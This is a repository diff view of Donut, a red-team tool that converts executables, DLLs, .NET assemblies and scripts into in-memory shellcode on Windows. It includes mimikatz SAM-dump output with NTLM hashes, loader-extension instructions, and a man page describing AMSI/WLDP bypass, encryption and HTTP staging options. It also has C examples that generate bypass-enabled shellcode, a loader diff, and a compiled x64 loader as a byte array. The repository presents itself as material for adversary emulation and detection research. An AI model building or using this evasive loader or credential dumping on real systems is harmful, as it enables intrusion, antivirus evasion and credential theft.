## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(commandline) # lsadump::sam
Domain : DESKTOP-B888L2R
SysKey : b43927eef0f56833c527ea951c37abc1
Local SID : S-1-5-21-1047138248-288568923-692962947
SAMKey : f1813d42812fcde9c5fe08807370613d
RID : 000001f4 (500)
User : Administrator
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
RID : 000001f8 (504)
User : WDAGUtilityAccount
Hash NTLM: c288f1c30b232571b0222ae6a5b7d223
RID : 000003e9 (1001)
User : john
Hash NTLM: 8846f7eaee8fb117ad06bdd830b7586c
RID : 000003ea (1002)
User : user
Hash NTLM: 5835048ce94ad0564e29a924a03510ef
RID : 000003eb (1003)
User : test
mimikatz(commandline) # exit
Bye!
DEBUG: inmem_pe.c:338:RunPE(): Process terminated
DEBUG: inmem_pe.c:349:RunPE(): Erasing 1019904 bytes of memory at 00000178FF170000
DEBUG: inmem_pe.c:353:RunPE(): Releasing memory
DEBUG: loader/loader.c:343:MainProc(): Erasing RW memory for instance
DEBUG: loader/loader.c:346:MainProc(): Releasing RW memory for instance
DEBUG: loader/loader.c:354:MainProc(): Returning to caller
</pre>
<p>Obviously you should be cautious with what files you decide to execute on your machine.</p>
<h2 id="loader">13. Extending The Loader</h2>
<p>Donut was never designed with modularity in mind, however, a new version in future will try to simplify the process of extending the loader, so that others can write their own code for it. Currently, simple changes to the loader can sometimes require lots of changes to the entire code base and this isn't really ideal. If for any reason you want to update the loader to include additional functionality, the following steps are required.</p>
<h3>1. Declare the function pointers</h3>
<p>For each API you want the loader to use, declare a function pointer in loader/winapi.h. For example, the <code>Sleep</code> API is declared in its SDK header file as:</p>
<pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#400000; '>Sleep</span><span style='color:#808030; '>(</span><span style='color:#603000; '>DWORD</span> dwMilliseconds<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
</pre>
<p>The function pointer for this would be declared in loader/winapi.h as:</p>
<pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>(</span><span style='color:#603000; '>WINAPI</span> <span style='color:#808030; '>*</span>Sleep_t<span style='color:#808030; '>)</span><span style='color:#808030; '>(</span><span style='color:#603000; '>DWORD</span> dwMilliseconds<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
</pre>
<h3>2. Update the API string array and function pointer array</h3>
<p>At the moment, Donut resolves API using a 64-bit hash, which is calculated by the generator before being stored in the loader itself. In donut.c is a variable called <var>api_imports</var>, declared as an array of <code>API_IMPORT</code> structures. Each entry contains a case-sensitive API string and corresponding DLL string in lowercase. The <code>Sleep</code> API is exported by kernel32.dll, so if we want the loader to use Sleep, the <code>api_imports</code> must have the following added to it. This array is terminated by an empty entry.</p>
<pre style='color:#000000;background:#ffffff;'> <span style='color:#800080; '>{</span>KERNEL32_DLL<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>Sleep</span><span style='color:#800000; '>"</span><span style='color:#800080; '>}</span><span style='color:#808030; '>,</span>
</pre>
<p>Of course, KERNEL32_DLL used here is a symbolic constant for "kernel32.dll".</p>
<p>The <code>DONUT_INSTANCE</code> structure is defined in include/donut.h and one of the fields called <code>api</code> is defined as a union to hold three members. <var>hash</var> is an array of <code>uint64_t</code> integers to hold a 64-bit hash of each API string. <var>addr</var> is an array of <code>void*</code> pointers to hold the address of an API in memory and finally a structure holding all the function pointers. These pointers are placed in the same order as the API strings stored in <var>api_imports</var>. Currently, the <var>api</var> member can hold up to 64 function pointers or hashes, but this can be increased if required.</p>
<p>Where you place the API string in <var>api_imports</var> is entirely up to you, but it <em>must</em> be in the same order as where the function pointer is placed in the <code>DONUT_INSTANCE</code> structure.</p>
<h3>3. Update DLL names</h3>
<p>A number of DLL are already loaded by a process; ntdll.dll, kernel32.dll and kernelbase.dll. For everything else, the instance contains a list of DLL strings loaded before attempting to resolve the address of APIs. The following list of DLLs seperated by semi-colon are loaded prior to resolving API. If the API you want Donut loader to use is exported by a DLL not shown here, you need to add it to the list.</p>
<pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// required for each API used by the loader</span>
<span style='color:#004a43; '>#</span><span style='color:#004a43; '>define</span><span style='color:#004a43; '> DLL_NAMES </span><span style='color:#800000; '>"</span><span style='color:#0000e6; '>ole32;oleaut32;wininet;mscoree;shell32;dnsapi</span><span style='color:#800000; '>"</span>
</pre>
<h3>4. Calling an API</h3>
<p>If the API were successfully resolved, simply referencing the function pointer in a pointer to <code>DONUT_INSTANCE</code> is enough to invoke it. The following line of code shows how to call the <code>Sleep</code> API declared earlier.</p>
<pre style='color:#000000;background:#ffffff;'>inst<span style='color:#808030; '>-</span><span style='color:#808030; '>></span>api<span style='color:#808030; '>.</span><span style='color:#400000; '>Sleep</span><span style='color:#808030; '>(</span><span style='color:#008c00; '>1000</span><span style='color:#808030; '>*</span><span style='color:#008c00; '>5</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
</pre>
<p>Future plans for Donut are to provide multiple options for resolving API; Import Address Table (IAT), Export Address Table (EAT) and <a href="https://modexp.wordpress.com/2019/05/19/shellcode-getprocaddress/">Exception Directory</a> to name a few. It should also be much easier to write custom payloads using the loader.</p>
</body>
</html>

131
docs/donut.1
View File

@ -1,131 +0,0 @@
'\" t
.\" Title: donut
.\" Author: Odzhan
.\" Date: 12/24/2019
.\" Manual: Donut Reference Guide
.\" Source: Donut
.\" Language: English
.\"
.TH "DONUT" "1" "12/24/2019" "Donut v0.9.3" "Donut Reference Guide"
.SH NAME
donut \- shellcode generator
.SH SYNOPSIS
.B donut
[options]
.IR file ...
.SH DESCRIPTION
Donut, named after the dotNET framework, generates position-independent code for in-memory execution of VBScript, JScript, EXE/DLL files on the Microsoft Windows operating system. Both managed .NET assemblies and unmanaged/native EXE, DLL files are supported by the loader. There are dynamic and static libraries available for both Windows and Linux.
.SH MODULE OPTIONS
.TP
.BR \-n " " <name>
Module name for HTTP staging. If entropy is enabled, this is generated randomly.
.TP
.BR \-s " " <server>
URL for the HTTP server that will host a Donut module.
.TP
.BR \-e " " <level>
Entropy level. 1=None, 2=Generate random names, 3=Generate random names + use symmetric encryption (default).
.SH PIC/SHELLCODE OPTIONS
.TP
.BR \-a " " <arch>
Target architecture for loader : 1=x86, 2=amd64, 3=x86+amd64(default).
.TP
.BR \-b " " <level>
Behavior for bypassing AMSI/WLDP : 1=None, 2=Abort on fail, 3=Continue on fail.(default).
.TP
.BR \-o " " <path>
Output file to save loader. Default is "loader.bin".
.TP
.BR \-f " " <format>
Output format. 1=Binary (default), 2=Base64, 3=C, 4=Ruby, 5=Python, 6=PowerShell, 7=C#, 8=Hexadecimal.
.TP
.BR \-y " " <addr>
Create a new thread for loader and continue execution at address supplied. \fIaddr\fR must be in hexadecimal format.
.TP
.BR \-x " " <action>
Determines how the loader should exit. 1=exit thread (default), 2=exit process.
.SH FILE OPTIONS
.TP
.BR \-c " " <namespace.class>
Optional class name. (required for .NET DLL)
.TP
.BR \-d " " <name>
AppDomain name to create for .NET assembly. If entropy is enabled, this is generated randomly.
.TP
.BR \-m " " <method | api>
Optional method or function for DLL. (a method is required for .NET DLL)
.TP
.BR \-p " " <arguments>
Optional arguments/command line inside quotations for DLL method/function or EXE.
.TP
.BR \-w
Command line is passed to unmanaged DLL function in UNICODE format. (default is ANSI)
.TP
.BR \-r " " <version>
CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.
.TP
.BR \-t
Run the entrypoint of an unmanaged/native EXE as a thread and wait for thread to end.
.TP
.BR \-z " " <engine>
Pack/Compress file. 1=None, 2=aPLib, 3=LZNT1, 4=Xpress.
Compression engines 3 abd 4 are only available on Windows.
.SH AUTHORS
Odzhan, TheWover
.SH DISCLAIMER
The authors are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct. In the event EDR or AV products are capable of detecting Donut via signatures or behavioral patterns, we will not update Donut to counter signatures or detection methods. To avoid being offended, please do not ask.
.SH COPYRIGHT
BSD 3-Clause License
Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
.SH "NOTES"
.IP " 1." 4
Loading .NET Assemblies From Memory.
.RS 4
\%https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/
.RE
.IP " 2." 4
Donut - Injecting .NET Assemblies as Shellcode
.RS 4
\%https://thewover.github.io/Introducing-Donut/
.RE
.IP " 3." 4
How Red Teams Bypass AMSI and WLDP for .NET Dynamic Code
.RS 4
\%https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/
.RE
.IP " 4." 4
In-Memory Execution of DLL
.RS 4
\%https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/
.RE
.IP " 5." 4
Data Compression
.RS 4
\%https://modexp.wordpress.com/2019/12/08/shellcode-compression/
.RE

BIN
donut.exe Normal file
View File

Binary file not shown.

83
examples/dynamic.c
View File

@ -1,83 +0,0 @@
// dynamic example (doesn't work with .NET DLL)
// odzhan
#include "donut.h"
int main(int argc, char *argv[]) {
DONUT_CONFIG c;
int err;
// function pointers
DonutCreate_t _DonutCreate;
DonutDelete_t _DonutDelete;
DonutError_t _DonutError;
// need at least a file
if(argc != 2) {
printf(" [ usage: donut_dynamic <file>\n");
return 0;
}
// try load donut.dll or donut.so
#if defined(WINDOWS)
HMODULE m = LoadLibrary("donut.dll");
if(m != NULL) {
_DonutCreate = (DonutCreate_t)GetProcAddress(m, "DonutCreate");
_DonutDelete = (DonutDelete_t)GetProcAddress(m, "DonutDelete");
_DonutError = (DonutError_t) GetProcAddress(m, "DonutError");
if(_DonutCreate == NULL || _DonutDelete == NULL || _DonutError == NULL) {
printf(" [ Unable to resolve Donut API.\n");
return 0;
}
} else {
printf(" [ Unable to load donut.dll.\n");
return 0;
}
#else
void *m = dlopen("donut.so", RTLD_LAZY);
if(m != NULL) {
_DonutCreate = (DonutCreate_t)dlsym(m, "DonutCreate");
_DonutDelete = (DonutDelete_t)dlsym(m, "DonutDelete");
_DonutError = (DonutError_t) dlsym(m, "DonutError");
if(_DonutCreate == NULL || _DonutDelete == NULL || _DonutError == NULL) {
printf(" [ Unable to resolve Donut API.\n");
return 0;
}
} else {
printf(" [ Unable to load donut.so.\n");
return 0;
}
#endif
memset(&c, 0, sizeof(c));
// copy input file
lstrcpyn(c.input, argv[1], DONUT_MAX_NAME-1);
// default settings
c.inst_type = DONUT_INSTANCE_EMBED; // file is embedded
c.arch = DONUT_ARCH_X84; // dual-mode (x86+amd64)
c.bypass = DONUT_BYPASS_CONTINUE; // continues loading even if disabling AMSI/WLDP/ETW fails
c.headers = DONUT_HEADERS_OVERWRITE;// overwrite PE headers
c.format = DONUT_FORMAT_BINARY; // default output format
c.compress = DONUT_COMPRESS_NONE; // compression is disabled by default
c.entropy = DONUT_ENTROPY_DEFAULT; // enable random names + symmetric encryption by default
c.exit_opt = DONUT_OPT_EXIT_THREAD; // default behaviour is to exit the thread
c.thread = 1; // run entrypoint as a thread
c.unicode = 0; // command line will not be converted to unicode for unmanaged DLL function
// generate the shellcode
err = _DonutCreate(&c);
if(err != DONUT_ERROR_SUCCESS) {
printf(" [ Error : %s\n", _DonutError(err));
return 0;
}
printf(" [ loader saved to %s\n", c.output);
_DonutDelete(&c);
return 0;
}

45
examples/static.c
View File

@ -1,45 +0,0 @@
// static example (doesn't work with .NET DLL)
// odzhan
#include "donut.h"
int main(int argc, char *argv[]) {
DONUT_CONFIG c;
int err;
// need at least a file
if(argc != 2) {
printf(" [ usage: donut_static <file>\n");
return 0;
}
memset(&c, 0, sizeof(c));
// copy input file
lstrcpyn(c.input, argv[1], DONUT_MAX_NAME-1);
// default settings
c.inst_type = DONUT_INSTANCE_EMBED; // file is embedded
c.arch = DONUT_ARCH_X84; // dual-mode (x86+amd64)
c.bypass = DONUT_BYPASS_CONTINUE; // continues loading even if disabling AMSI/WLDP/ETW fails
c.headers = DONUT_HEADERS_OVERWRITE;// overwrite PE headers
c.format = DONUT_FORMAT_BINARY; // default output format
c.compress = DONUT_COMPRESS_NONE; // compression is disabled by default
c.entropy = DONUT_ENTROPY_DEFAULT; // enable random names + symmetric encryption by default
c.exit_opt = DONUT_OPT_EXIT_THREAD; // default behaviour is to exit the thread
c.thread = 1; // run entrypoint as a thread
c.unicode = 0; // command line will not be converted to unicode for unmanaged DLL function
// generate the shellcode
err = DonutCreate(&c);
if(err != DONUT_ERROR_SUCCESS) {
printf(" [ Error : %s\n", DonutError(err));
return 0;
}
printf(" [ loader saved to %s\n", c.output);
DonutDelete(&c);
return 0;
}

7
generators/Readme.md
View File

@ -1,7 +0,0 @@
# Generators
This folder contains Donut generators written in other languages than C. They are all developed by third-parties and are maintained separately, but are linked here as submodules. To clone Donut along with the submodules, run:
```
git clone https://github.com/TheWover/donut.git --recursive
```

1
generators/go-donut

@ -1 +0,0 @@
Subproject commit fcdcc35d591c954251d96642b93040527cee608d

BIN
img/ST_generate_and_copy.PNG
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 69 KiB

BIN
img/ST_generate_and_copy_86.PNG
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 26 KiB

BIN
img/ST_inject.PNG
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 16 KiB

BIN
img/ST_success.PNG
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 293 KiB

BIN
img/detected.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 185 KiB

BIN
img/donut.PNG
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 490 KiB

BIN
img/donut_logo.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 58 KiB

BIN
img/donut_logo_black.jpg
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 88 KiB

BIN
img/donut_logo_white.jpg
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 83 KiB

BIN
img/generate_and_copy.PNG
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 69 KiB

BIN
img/iexplore.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 17 KiB

21
loader/inmem_dotnet.c
View File

@ -48,12 +48,31 @@ BOOL LoadAssembly(PDONUT_INSTANCE inst, PDONUT_MODULE mod, PDONUT_ASSEMBLY pa) {
(LPVOID*)&pa->icmh);
if(SUCCEEDED(hr)) {
DPRINT("ICLRMetaHost::GetRuntime(\"%s\")", mod->runtime);
//DPRINT("ICLRMetaHost::GetRuntime(\"%s\")", mod->runtime);
mod->runtime[1]='4';
mod->runtime[5]='3';
mod->runtime[7]='3';
mod->runtime[8]='1';
mod->runtime[9]='9';
ansi2unicode(inst, mod->runtime, buf);
hr = pa->icmh->lpVtbl->GetRuntime(
pa->icmh, buf,
(REFIID)&inst->xIID_ICLRRuntimeInfo, (LPVOID)&pa->icri);
if (!SUCCEEDED(hr))
{
mod->runtime[1]='2';
mod->runtime[5]='5';
mod->runtime[7]='7';
mod->runtime[8]='2';
mod->runtime[9]='7';
ansi2unicode(inst, mod->runtime, buf);
hr = pa->icmh->lpVtbl->GetRuntime(
pa->icmh, buf,
(REFIID)&inst->xIID_ICLRRuntimeInfo, (LPVOID)&pa->icri);
}
if(SUCCEEDED(hr)) {
DPRINT("ICLRRuntimeInfo::IsLoadable");

166
loader_exe_x64.go
View File

@ -7,24 +7,24 @@ var LOADER_EXE_X64 = []byte{
0x74, 0x24, 0x18, 0x57, 0x41, 0x56, 0x41, 0x57, 0x48, 0x81, 0xec, 0x00,
0x05, 0x00, 0x00, 0x33, 0xff, 0x48, 0x8b, 0xd9, 0x39, 0xb9, 0x38, 0x02,
0x00, 0x00, 0x0f, 0x84, 0xce, 0x00, 0x00, 0x00, 0x4c, 0x8b, 0x41, 0x28,
0x48, 0x8b, 0x91, 0x88, 0x00, 0x00, 0x00, 0xe8, 0x34, 0x2e, 0x00, 0x00,
0x48, 0x8b, 0x91, 0x88, 0x00, 0x00, 0x00, 0xe8, 0x94, 0x2e, 0x00, 0x00,
0x48, 0x85, 0xc0, 0x0f, 0x84, 0xaf, 0x00, 0x00, 0x00, 0x48, 0x21, 0x7c,
0x24, 0x28, 0x4c, 0x8d, 0x05, 0x77, 0x13, 0x00, 0x00, 0x21, 0x7c, 0x24,
0x24, 0x28, 0x4c, 0x8d, 0x05, 0xd7, 0x13, 0x00, 0x00, 0x21, 0x7c, 0x24,
0x20, 0x4c, 0x8b, 0xcb, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0xd0, 0x4c, 0x8b,
0x43, 0x28, 0x48, 0x8b, 0xcb, 0x48, 0x8b, 0x93, 0x08, 0x02, 0x00, 0x00,
0x48, 0x8b, 0xf8, 0xe8, 0xfc, 0x2d, 0x00, 0x00, 0x4c, 0x8b, 0x43, 0x28,
0x48, 0x8b, 0xf8, 0xe8, 0x5c, 0x2e, 0x00, 0x00, 0x4c, 0x8b, 0x43, 0x28,
0x48, 0x8b, 0xcb, 0x48, 0x8b, 0x93, 0xa0, 0x00, 0x00, 0x00, 0x4c, 0x8b,
0xf0, 0xe8, 0xe6, 0x2d, 0x00, 0x00, 0x4c, 0x8b, 0x43, 0x28, 0x48, 0x8b,
0xf0, 0xe8, 0x46, 0x2e, 0x00, 0x00, 0x4c, 0x8b, 0x43, 0x28, 0x48, 0x8b,
0xcb, 0x48, 0x8b, 0x93, 0xa8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xf0, 0xe8,
0xd0, 0x2d, 0x00, 0x00, 0x33, 0xc9, 0x48, 0x8b, 0xe8, 0xff, 0x53, 0x40,
0x30, 0x2e, 0x00, 0x00, 0x33, 0xc9, 0x48, 0x8b, 0xe8, 0xff, 0x53, 0x40,
0x4c, 0x8b, 0xf8, 0x4d, 0x85, 0xf6, 0x74, 0x4f, 0x48, 0x85, 0xf6, 0x74,
0x4a, 0x48, 0x85, 0xed, 0x74, 0x45, 0xc7, 0x44, 0x24, 0x60, 0x0b, 0x00,
0x10, 0x00, 0xff, 0xd5, 0x48, 0x8b, 0xc8, 0x48, 0x8d, 0x54, 0x24, 0x30,
0xff, 0xd6, 0x8b, 0x83, 0x38, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x4c, 0x24,
0x30, 0x48, 0x83, 0xa4, 0x24, 0xc8, 0x00, 0x00, 0x00, 0xf0, 0x49, 0x03,
0xc7, 0x33, 0xd2, 0x48, 0x89, 0x84, 0x24, 0x28, 0x01, 0x00, 0x00, 0x41,
0xff, 0xd6, 0xeb, 0x0b, 0x48, 0x83, 0xc8, 0xff, 0xeb, 0x08, 0xe8, 0xc9,
0x12, 0x00, 0x00, 0x48, 0x8b, 0xc7, 0x4c, 0x8d, 0x9c, 0x24, 0x00, 0x05,
0xff, 0xd6, 0xeb, 0x0b, 0x48, 0x83, 0xc8, 0xff, 0xeb, 0x08, 0xe8, 0x29,
0x13, 0x00, 0x00, 0x48, 0x8b, 0xc7, 0x4c, 0x8d, 0x9c, 0x24, 0x00, 0x05,
0x00, 0x00, 0x49, 0x8b, 0x5b, 0x20, 0x49, 0x8b, 0x6b, 0x28, 0x49, 0x8b,
0x73, 0x30, 0x49, 0x8b, 0xe3, 0x41, 0x5f, 0x41, 0x5e, 0x5f, 0xc3, 0xcc,
0xf0, 0xff, 0x41, 0x08, 0x8b, 0x41, 0x08, 0xc3, 0xb8, 0x01, 0x40, 0x00,
@ -52,7 +52,7 @@ var LOADER_EXE_X64 = []byte{
0x5b, 0xc3, 0xcc, 0xcc, 0x48, 0x8b, 0xc4, 0x53, 0x48, 0x83, 0xec, 0x60,
0x83, 0x60, 0x20, 0x00, 0x48, 0x8d, 0x48, 0xb8, 0x83, 0x60, 0x18, 0x00,
0x48, 0x8b, 0xda, 0x83, 0x60, 0x10, 0x00, 0x33, 0xd2, 0x44, 0x8d, 0x42,
0x40, 0xe8, 0xbe, 0x31, 0x00, 0x00, 0x48, 0x8b, 0x03, 0x48, 0x8d, 0x54,
0x40, 0xe8, 0x1e, 0x32, 0x00, 0x00, 0x48, 0x8b, 0x03, 0x48, 0x8d, 0x54,
0x24, 0x20, 0x48, 0x8b, 0xcb, 0xff, 0x50, 0x18, 0x85, 0xc0, 0x75, 0x1e,
0x48, 0x8b, 0x03, 0x4c, 0x8d, 0x4c, 0x24, 0x78, 0x4c, 0x8d, 0x84, 0x24,
0x80, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xcb, 0x48, 0x8d, 0x94, 0x24, 0x88,
@ -73,38 +73,38 @@ var LOADER_EXE_X64 = []byte{
0x28, 0x83, 0x20, 0x00, 0x33, 0xc0, 0xc3, 0xcc, 0x8d, 0x04, 0x11, 0xc3,
0x48, 0x89, 0x5c, 0x24, 0x18, 0x55, 0x56, 0x57, 0x41, 0x56, 0x41, 0x57,
0x48, 0x83, 0xec, 0x20, 0x48, 0x8d, 0x91, 0x54, 0x03, 0x00, 0x00, 0x48,
0x8b, 0xd9, 0xe8, 0x91, 0x28, 0x00, 0x00, 0x48, 0x8b, 0xf0, 0x48, 0x85,
0x8b, 0xd9, 0xe8, 0xf1, 0x28, 0x00, 0x00, 0x48, 0x8b, 0xf0, 0x48, 0x85,
0xc0, 0x75, 0x0a, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xe9, 0xe7, 0x00, 0x00,
0x00, 0x4c, 0x8d, 0x83, 0xc8, 0x05, 0x00, 0x00, 0x45, 0x33, 0xc9, 0x48,
0x8b, 0xd6, 0x48, 0x8b, 0xcb, 0xe8, 0x52, 0x29, 0x00, 0x00, 0x48, 0x8b,
0x8b, 0xd6, 0x48, 0x8b, 0xcb, 0xe8, 0xb2, 0x29, 0x00, 0x00, 0x48, 0x8b,
0xe8, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xc4, 0x00, 0x00, 0x00, 0x48, 0x8d,
0x3d, 0x8f, 0xff, 0xff, 0xff, 0x4c, 0x8d, 0x3d, 0x7c, 0xff, 0xff, 0xff,
0x41, 0x2b, 0xff, 0x0f, 0x88, 0xad, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x4c,
0x24, 0x50, 0x8b, 0xd7, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00, 0x44, 0x8b,
0xf7, 0x48, 0x8b, 0xc8, 0xff, 0x53, 0x60, 0x85, 0xc0, 0x0f, 0x84, 0x8f,
0x00, 0x00, 0x00, 0x44, 0x8b, 0xc7, 0x49, 0x8b, 0xd7, 0x48, 0x8b, 0xcd,
0xe8, 0x2b, 0x30, 0x00, 0x00, 0x44, 0x8b, 0x44, 0x24, 0x50, 0x4c, 0x8d,
0xe8, 0x8b, 0x30, 0x00, 0x00, 0x44, 0x8b, 0x44, 0x24, 0x50, 0x4c, 0x8d,
0x4c, 0x24, 0x58, 0x41, 0x8b, 0xd6, 0x48, 0x8b, 0xcd, 0xff, 0x53, 0x60,
0x4c, 0x8d, 0x83, 0xd8, 0x05, 0x00, 0x00, 0x45, 0x33, 0xc9, 0x48, 0x8b,
0xd6, 0x48, 0x8b, 0xcb, 0xe8, 0xdb, 0x28, 0x00, 0x00, 0x48, 0x8b, 0xf0,
0xd6, 0x48, 0x8b, 0xcb, 0xe8, 0x3b, 0x29, 0x00, 0x00, 0x48, 0x8b, 0xf0,
0x48, 0x85, 0xc0, 0x74, 0x51, 0x48, 0x8d, 0x3d, 0x30, 0xff, 0xff, 0xff,
0x4c, 0x8d, 0x35, 0x1d, 0xff, 0xff, 0xff, 0x41, 0x2b, 0xfe, 0x78, 0x3e,
0x4c, 0x8d, 0x4c, 0x24, 0x50, 0x8b, 0xd7, 0x41, 0xb8, 0x40, 0x00, 0x00,
0x00, 0x8b, 0xef, 0x48, 0x8b, 0xc8, 0xff, 0x53, 0x60, 0x85, 0xc0, 0x74,
0x25, 0x44, 0x8b, 0xc7, 0x49, 0x8b, 0xd6, 0x48, 0x8b, 0xce, 0xe8, 0xc1,
0x2f, 0x00, 0x00, 0x44, 0x8b, 0x44, 0x24, 0x50, 0x4c, 0x8d, 0x4c, 0x24,
0x25, 0x44, 0x8b, 0xc7, 0x49, 0x8b, 0xd6, 0x48, 0x8b, 0xce, 0xe8, 0x21,
0x30, 0x00, 0x00, 0x44, 0x8b, 0x44, 0x24, 0x50, 0x4c, 0x8d, 0x4c, 0x24,
0x58, 0x8b, 0xd5, 0x48, 0x8b, 0xce, 0xff, 0x53, 0x60, 0xe9, 0x11, 0xff,
0xff, 0xff, 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x60, 0x48, 0x83, 0xc4,
0x20, 0x41, 0x5f, 0x41, 0x5e, 0x5f, 0x5e, 0x5d, 0xc3, 0xcc, 0xcc, 0xcc,
0x48, 0x89, 0x5c, 0x24, 0x18, 0x48, 0x89, 0x74, 0x24, 0x20, 0x57, 0x48,
0x83, 0xec, 0x20, 0x48, 0x8d, 0x91, 0x68, 0x03, 0x00, 0x00, 0x48, 0x8b,
0xd9, 0xe8, 0x66, 0x27, 0x00, 0x00, 0x4c, 0x8d, 0x83, 0xe8, 0x05, 0x00,
0x00, 0x45, 0x33, 0xc9, 0x48, 0x8b, 0xd0, 0x48, 0x8b, 0xcb, 0xe8, 0x39,
0xd9, 0xe8, 0xc6, 0x27, 0x00, 0x00, 0x4c, 0x8d, 0x83, 0xe8, 0x05, 0x00,
0x00, 0x45, 0x33, 0xc9, 0x48, 0x8b, 0xd0, 0x48, 0x8b, 0xcb, 0xe8, 0x99,
0x28, 0x00, 0x00, 0x48, 0x8b, 0xf8, 0x48, 0x85, 0xc0, 0x74, 0x42, 0xbe,
0x01, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x4c, 0x24, 0x30, 0x8b, 0xd6, 0x48,
0x8b, 0xc8, 0x44, 0x8d, 0x46, 0x3f, 0xff, 0x53, 0x60, 0x85, 0xc0, 0x74,
0x28, 0x48, 0x8d, 0x93, 0x0c, 0x06, 0x00, 0x00, 0x44, 0x8b, 0xc6, 0x48,
0x8b, 0xcf, 0xe8, 0x2d, 0x2f, 0x00, 0x00, 0x44, 0x8b, 0x44, 0x24, 0x30,
0x8b, 0xcf, 0xe8, 0x8d, 0x2f, 0x00, 0x00, 0x44, 0x8b, 0x44, 0x24, 0x30,
0x4c, 0x8d, 0x4c, 0x24, 0x38, 0x8b, 0xd6, 0x48, 0x8b, 0xcf, 0xff, 0x53,
0x60, 0x8b, 0xc6, 0xeb, 0x02, 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x40,
0x48, 0x8b, 0x74, 0x24, 0x48, 0x48, 0x83, 0xc4, 0x20, 0x5f, 0xc3, 0xcc,
@ -113,7 +113,7 @@ var LOADER_EXE_X64 = []byte{
0x78, 0x03, 0x00, 0x00, 0x45, 0x33, 0xff, 0x48, 0x8b, 0xf9, 0x44, 0x21,
0xbd, 0xd8, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x4c, 0x24, 0x60, 0x33, 0xd2,
0x33, 0xf6, 0xbb, 0x00, 0x03, 0x60, 0x04, 0x45, 0x8d, 0x77, 0x68, 0x45,
0x8b, 0xc6, 0xe8, 0xe1, 0x2e, 0x00, 0x00, 0xb9, 0x04, 0x01, 0x00, 0x00,
0x8b, 0xc6, 0xe8, 0x41, 0x2f, 0x00, 0x00, 0xb9, 0x04, 0x01, 0x00, 0x00,
0x44, 0x89, 0x74, 0x24, 0x60, 0x89, 0x4d, 0x80, 0x48, 0x8d, 0x85, 0x60,
0x01, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x78, 0x4c, 0x8d, 0x4c, 0x24,
0x60, 0x89, 0x4d, 0xb0, 0x48, 0x8d, 0x45, 0x50, 0x48, 0x89, 0x45, 0xa8,
